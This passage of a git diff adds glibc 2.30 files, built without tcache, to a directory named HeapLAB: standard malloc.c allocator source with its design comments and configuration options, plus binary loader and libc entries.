+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM,
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+ * ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.30_no-tcache/ld-2.30.so b/HeapLAB/.glibc/glibc_2.30_no-tcache/ld-2.30.so
new file mode 100755
index 0000000..50b152a
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.30_no-tcache/ld-2.30.so differ
diff --git a/HeapLAB/.glibc/glibc_2.30_no-tcache/ld.so.2 b/HeapLAB/.glibc/glibc_2.30_no-tcache/ld.so.2
new file mode 120000
index 0000000..694f035
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.30_no-tcache/ld.so.2
@@ -0,0 +1 @@
+ld-2.30.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.30_no-tcache/libc-2.30.so b/HeapLAB/.glibc/glibc_2.30_no-tcache/libc-2.30.so
new file mode 100755
index 0000000..554a063
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.30_no-tcache/libc-2.30.so differ
diff --git a/HeapLAB/.glibc/glibc_2.30_no-tcache/libc.so.6 b/HeapLAB/.glibc/glibc_2.30_no-tcache/libc.so.6
new file mode 120000
index 0000000..a5e9e38
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.30_no-tcache/libc.so.6
@@ -0,0 +1 @@
+libc-2.30.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.30_no-tcache/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.30_no-tcache/malloc/malloc.c
new file mode 100644
index 0000000..00ce48c
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.30_no-tcache/malloc/malloc.c
@@ -0,0 +1,5589 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2019 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summmaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+
+/* Maximum chunks in tcache bins for tunables.  This value must fit the range
+   of tcache->counts[] entries, else they may overflow.  */
+# define MAX_TCACHE_COUNT UINT16_MAX
+#endif
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG malloinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minumum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
